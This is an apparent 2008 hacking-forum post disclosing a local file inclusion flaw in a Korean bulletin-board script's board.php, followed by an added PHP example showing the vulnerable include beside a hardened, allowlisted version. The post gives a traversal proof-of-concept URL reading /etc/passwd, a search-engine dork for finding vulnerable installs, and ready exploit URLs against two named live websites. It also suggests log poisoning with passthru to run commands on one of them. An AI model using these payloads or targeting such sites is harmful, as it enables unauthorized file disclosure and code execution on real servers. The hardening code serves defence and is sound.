Guest Kenpachi
Posted March 17, 2008

BBS BOARD UNKNOWN VERSION (can't read fucking Korean ... sry)

Bug type: Local File Inclusion
Affected file: board.php
Affected code:
include "./board/" . $skin_dir . $Action . ".php";
Stupid ass blocking code:
if(!isset($Table) && empty($Table) && $Action != "total_list") AlertMessage("게시판의 테이블이 지정되지 않았습니다! 테이블을 지정하세요.");
Proof of concept:
http://victim/[bbs path]/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=dfgdsa
Dork: inurl:"bbs/board.php?Action"

And since I can't find a downloading site to prove my worthless LFI bug exists ... here's a couple of examples:
http://east-one.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=a
http://www.sinhungsa.or.kr/bbs/board.php?Action=../../../../../../../../../../../../etc/passwd%00&Table=a

If you really want to read the source code ... find the logs on east-one.kr ... inject a passthru and do 'cat board.php' to see what I'm talking about :\

//Kenpachi
//http://rstcenter.com/forum
//Nemessis + Ahead = BUTTSEX
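The include pattern the post describes, with a hardened version beside it, as an added example; this is not the board's own code. The action allowlist, the skin name and the base directory are assumptions for illustration.

```php
<?php
// Added example, not the BBS code. $allowedActions, $skinDir and the base
// directory are assumed values; the real board's configuration is unknown.

// Vulnerable shape from the post: $Action comes straight from the request, so
// "../" sequences (and a trailing NUL byte on old PHP) steer the include to
// any readable file on disk. The $Table check does nothing to stop that.
function vulnerableIncludePath(string $skinDir, string $action): string
{
    return "./board/" . $skinDir . $action . ".php";
}

// Hardened: allowlist the action, reject separators and NUL bytes, then
// confirm the resolved file really lives under the skin directory.
function safeIncludePath(string $baseDir, string $skinDir, string $action, array $allowedActions): ?string
{
    if (!in_array($action, $allowedActions, true)) {
        return null;                                   // unknown action: refuse
    }
    if (strpbrk($skinDir, "/\\\0") !== false) {
        return null;                                   // skin must be a bare name
    }
    $root   = realpath($baseDir);
    $target = realpath($baseDir . '/' . $skinDir . '/' . $action . '.php');
    if ($root === false || $target === false) {
        return null;                                   // directory or file missing
    }
    // realpath() already collapsed any "..", so containment is a prefix check.
    if (strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;                                   // resolved outside $root
    }
    return $target;
}

$allowedActions = ['list', 'read', 'write', 'total_list']; // assumed set
$skinDir        = 'default';                                // assumed skin
$action         = $_GET['Action'] ?? 'list';

$path = safeIncludePath(__DIR__ . '/board', $skinDir, $action, $allowedActions);
if ($path === null) {
    http_response_code(400);
    exit('invalid action');
}
include $path;
```

With the allowlist checked first, a request such as `Action=../../../../etc/passwd%00` is rejected before any path is built, and the realpath containment check catches anything a misconfigured skin name could otherwise smuggle in.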